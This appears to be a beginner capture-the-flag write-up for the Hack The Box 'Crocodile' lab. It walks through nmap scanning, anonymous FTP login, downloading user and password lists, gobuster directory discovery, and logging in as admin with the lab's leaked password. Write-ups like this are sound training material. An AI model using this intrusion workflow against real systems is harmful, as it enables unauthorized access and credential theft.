Enumeration
As usual, let's start with nmap:
nmap -sV -sC IP
Replace IP by the IP of the target machine (Crocodile)
Note: The IP of our target machine will change all the time, make sure your replace IP in the command below by the target machine's IP. You can find the target's IP directly from your hack the box account.
Port 21 is open which is FTP (File Transfer Protocol)
Notice the line ftp-anom: Anonymous FTP login allowed (FTP code 230)
Anonymous FTP login allowed means that we should be able to login with the username anonymous. When the anonymous login is allowed, the system will not check the password you provide, meaning that you can provide any password you like and still get in!
Let's try it!
ftp 10.129.203.194
Type
anonymous
Press enter
It worked! We are in as anonymous! And we were not even asked for a password!
Type ls to list the files
We can see we have 2 files that seem interesting.
Let's download these files onto our machine by using the get command:
get allowed.userlist
get allowed.userlist.passwd
Now if you open your home folder, you will see these 2 files have been downloaded on your machine:
Let's open allowed.userslist :
Looks like a list of usernames!
Let's open allowed.userlist.paswd
Looks like these are the password for all the allowed users found in the first file!
So it looks like we now have the password for the account admin !
The password is rKXM59ESxesUFHAd
When we did our nmap earlier, we noticed that port 80 is open. From our VM, let's open our browser, and type the IP for our target machine (Crocodile) into our url search bar and press enter:
Now let's use gobuster to find any hidden directories:
gobuster dir -u 10.129.203.194 -w /usr/share/dirb/wordlists/common.txt -x .php
-x .php is added at the end to look for any files with .php extension too
Gobuster found /login.php
That's interesting, we might be able to use the credentials we just found.
Open your browser again and type the following in the url bar:
10.129.203.194/login.php
We get a login page:
Let's try to login with the username and password we just found
username : admin
password: rKXM59ESxesUFHAd
The flag is right there!
Congratulations! You got your flag!
Comments